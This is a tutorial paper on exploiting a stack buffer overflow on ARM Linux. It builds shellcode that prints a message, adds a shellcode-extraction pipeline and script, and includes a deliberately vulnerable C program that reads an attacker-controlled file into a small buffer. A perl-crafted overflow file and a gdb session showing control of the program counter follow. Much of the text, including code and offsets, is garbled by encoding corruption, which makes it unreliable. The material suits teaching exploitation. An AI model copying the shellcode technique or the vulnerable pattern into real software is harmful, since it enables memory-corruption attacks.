INTRODUCTION TO ARM LINUX EXPLOITING

Metin KAYA
kayameti@gmail.cm
!"#$."#."%& #'($"& I)tan*+l
,tt-(..///.en0e1+ni2.1g.metin
,tt-(..///.t/itte1.cm.3metinkaya
This paper is the Linux version of the document
http://www.signalsec.com/publications/arm_exploiting.pdf which mentions exploiting ARM on
indows s!stems. Than"s #elil $%$&'R for inspiring me.
The ARM architecture is used in crucial positions( e.g.) mobile phones) femtocells) smallcells)
*#A+A s!stems) ,-* machines.
.asic "nowledge on ARM) /+.) /##) #) assembl!) ,!thon) and some bash commands is
necessar! to understand what is going on in the document.
The host machine is x01 Linux 234 bit 3.5.6 "ernel7) so an ARM cross compiler 89: is re;uired for
target machine which is ARMv< little=endian Linux 234 bit 4.1.3> "ernel7.
At first) it?s needed to write an ARM shellcode for a small piece of code. Let?s write @arm
exploit.A onto screen. Bere is assembl! codes for it:
# C equivalent is write(stdout, arm exploit\n, 13);
# file: ello!arm"#
"se$tion "text
"%lo&al !start
!start:
# !write()
mov r', #13 # len%t of strin% (arm exploit"(
mov r1, p$ # r1 ) p$"
add r1, #'* # r1 ) p$ + '*: address of te strin%"
mov r,, -,x1
mov r., -,x*
sv$ ,
# !exit()
su& r,, r,, r,
mov r., -,x1
sv$ ,
"as$ii (arm exploit"\n(
Cn order to generate 'LD file for the codes above) we need to an assembler and the lin"er. Bere
is the steps:
x86 $ arm-none-linux-gnueabi-as -o hello_arm.o hello_arm.S
x86 $ arm-none-linux-gnueabi-ld -o hello_arm hello_arm.o
%ow) the file hello_arm can be executed on the target machine:
arm $./hello_arm
arm exploit.
e can obtain opcodes via disassembling the hello_arm.S with obEdump:
x86 $ arm-none-linux-gnueabi-objdump -d hello_arm
hello_arm: file format elf32-littlearm
Disassembly of section .text:
00000000 <_start>:
0: e3a0200d mov r2, !3
": e!a0!00f mov r!, pc
#: e2#!!0!# add r!, r!, 2"
c: e3a0000! mov r0, !
!0: e3a0$00" mov r$, "
!": ef000000 svc 0x00000000
!#: e0"00000 s%b r0, r0, r0
!c: e3a0$00! mov r$, !
20: ef000000 svc 0x00000000
2": 20&d$2&! .'ord 0x20&d$2&!
2#: &c$0$#&( .'ord 0x&c$0$#&(
2c: 2e$"&)&f .'ord 0x2e$"&)&f
Cf these opcodes are converted to little=endian ARM formatted 2for instance( e3a6466d ==F
6d46a6e3 ==F Gx6dGx46Gxa6Gxe37 char arra!) then the shellcode will be produced. These
conversation repeats man! steps) so the! will be automatiHed with a bash command and
,!thon script:
x86 $ arm-none-linux-gnueabi-objdump -d execve_arm | sed -n '/Disassembly o
sec!ion .!ex!"/#/Disassembly o sec!ion .ini"/p' | !ail -n $% | head -n -& |
cu! -d '"' - & | cu! -d ' ' - ' | !r -d '(!'
0d20a0e3
0f!0a0e!
!#!0#!e2
0!00a0e3
0"$0a0e3
000000ef
0000"0e0
0!$0a0e3
000000ef
&!$2&d20
&($#$0&c
&f&)$"2e
The ,!thon codes below can convert the output to a shellcode:
file: od2sc.py
import fileinp%t
for line in fileinp%t.inp%t*+:
h , line.rstrip*+
r , -.//x. 0 h-i : i021 for i in ran2e*0, len*h+, 2+1
r.reverse*+
print .34s3. 4 ...5oin*r+
x86 $ arm-none-linux-gnueabi-objdump -d execve_arm | sed -n '/Disassembly o
sec!ion .!ex!"/#/Disassembly o sec!ion .ini"/p' | !ail -n $% | head -n -& |
cu! -d '"' - & | cu! -d ' ' - ' | od&sc.py
3/x0d/x20/xa0/xe33
3/x0f/x!0/xa0/xe!3
3/x!#/x!0/x#!/xe23
3/x0!/x00/xa0/xe33
3/x0"/x$0/xa0/xe33
3/x00/x00/x00/xef3
3/x00/x00/x"0/xe03
3/x0!/x$0/xa0/xe33
3/x00/x00/x00/xef3
3/x&!/x$2/x&d/x203
3/x&(/x$#/x$0/x&c3
3/x&f/x&)/x$"/x2e3
This ,!thon script can be accessed via http://enderunix.org/metin/od4sc.p! .
Let?s implement a basic exploitable code for Linux:
67
7 8etin 9:;: <<ayameti=2mail.com>
7 20!2.!2.2#, >stanb%l.
7 ?ile: arm_bof.c
7 @ompile: arm-none-lin%x-2n%eabi-2cc -Aconversion -Aall -A -pedantic -ansi -2
-22db -o arm_bof arm_bof.c
7 Bard'are: :C8v$
7 9ernel: 2.&.3"
7 D@@: ".".2
76
incl%de <stdio.h>
incl%de <stdlib.h>
incl%de <sys6mman.h>
67 this shellcode respresents 3'rite*stdo%t, 3arm exploit./n3, !3+E3. 76
char shellcode-1 ,
3/x0d/x20/xa0/xe33
3/x0f/x!0/xa0/xe!3
3/x!#/x!0/x#!/xe23
3/x0!/x00/xa0/xe33
3/x0"/x$0/xa0/xe33
3/x00/x00/x00/xef3
3/x00/x00/x"0/xe03
3/x0!/x$0/xa0/xe33
3/x00/x00/x00/xef3
3/x&!/x$2/x&d/x203
3/x&(/x$#/x$0/x&c3
3/x&f/x&)/x$"/x2e3E
void
bof*void+
F
?>GH 7fpE
char fname-1 , 3file.ov3E
char b%f-2(&1E
fp , fopen*fname, 3r3+E
if *Ifp+ F
fprintf*stderr, 3can.t open fname .4s.I/n3, fname+E
ret%rnE
J
memset*b%f, 0x0, siKeof*b%f++E
fread*b%f, siKeof*char+, (!2, fp+E 67 overflo'. 76
67 fclose*fp+E 76
J
int
main*void+
F
67 provide exec%te permission to the memory re2ion of the shellcode. 76
mprotect**void 7+ **%nsi2ned int+ shellcode L M"0)(+, 0x!000, NCOP_CH:D Q
NCOP_AC>PH Q NCOP_HRH@+E
bof*+E
ret%rn 0E
J
Cn order to compile the file) please issue the command @x86 $ arm-none-linux-gnueabi-gcc
-)conversion -)all -) -pedan!ic -ansi -g -ggdb -o arm_bo arm_bo.cA.
The line @fclose(fp);A is commented out cause of pipelines of RC*# ="eep in mind ARM?s RC*#
based= architecture. fclose() related opcodes are loaded to ,# before fread() related operations
were finished. *ince this paper is Eust a proof of concept) this line is commented out.
%ow) it?s turn of file.ov. Let?s find out the address of the shellcode with /+.:
x86 $ arm-none-linux-gnueabi-gdb -* arm_bo
Ceadin2 symbols from arm_bof...done.
*2db+ p Lshellcode
S! , *char *7+-")1+ +x'+8,+ /- shellcode'un adresi. -/
*2db+ T
Cf we anal!He arm_bof binar! with C+A ,ro) then it?s obvious that *, refers to the 4<4th b!te:
Dor this reason) the file file.ov should contain at least 4<4 x A I 2and address of shellcode: >
b!tes7 J 4<1 b!tes long. The file can be produced with a ,erl command:
$ perl -e 'prin! ./. x &8+'0 ile.ov
The address of the shellcode must start from the 4<4th b!te. The final version of the file must
be li"e that:
Kpload file.ov and arm_bof files to the target machine and execute arm_bof file:
arm $ ./arm_bo
arm exploit.
arm $
Let?s run arm_bof with /+. step b! step:
arm $ gdb -* ./arm_bo
Ceadin2 symbols from arm_bof...done.
1gdb2 b bo
Urea<point ! at 0x#(2": file arm_bof.c, line 3$.
1gdb2 r
Vtartin2 pro2ram: arm_bof
Urea<point !, bof *+ at arm_bof.c:3$
3$ char fname-1 , 3file.ov3E
1gdb2 n
"0 fp , fopen*fname, 3r3+E
*2db+
"! if *Ifp+ F
*2db+
"& memset*b%f, 0x0, siKeof*b%f++E
*2db+
"$ fread*b%f, siKeof*char+, (!2, fp+E 67 overflo'. 76
*2db+
") J
*2db+
0x000!0#)0 in shellcode *+
1gdb2 ino regis!ers
r0 0x!!# 2#0
r! 0x! !
r2 0x0 0
r3 0x!!00# &)&"0
r" 0x!a0 "!&
r( 0x"0!"ebc0 !0$(!!2#)&
r& 0x"0!"d000 !0$(!0($)2
r$ 0x0 0
r# 0x0 0
r) 0x0 0
r!0 0x"0022000 !0$3##!0##
r!! 0x"!"!"!"! !0)"$)((#(
r!2 0xfbad2")# "222"2#3!2
sp 0xbed#!cc0 0xbed#!cc0
lr 0x"00#a"d0 !0$"30#30"
pc +x'+8,+ +x'+8,+ 3shellcode0
fps 0x!00!000 !&$#!3!2
cpsr 0x&00000!0 !&!0&!2$(2
1gdb2 n
Vin2le steppin2 %ntil exit from f%nction shellcode,
'hich has no line n%mber information.
arm exploi!. /- 456789 -/
Nro2ram exited normally.
1gdb2 *
arm $
As !ou see) ,# contains the address of the shellcode which means the target was successfull!
nu"edL
Stay tuned for Android exploiting...
NOTLAR(
4#5 #ode *ourcer! ARM cross compiler:
http://www.mentor.com/embedded=software/sourcer!=tools/sourcer!=codebench/editions/lite=edi
tion/.
4!5 Bow to #reate *hellcode on ARM Architecture: http://www.exploit=db.com/papers/95154/
4$5 +esigning *hellcode +em!stified: http://www.enderunix.org/docs/en/sc=en.txt
465 T,e +-0ate0 7e1)in 8 t,e 0c+ment al/ay) /ill *e n t,e a001e))
,tt-(..///en0e1+ni2.1g.metin.e2-lit3a1m3lin+23en.-08 .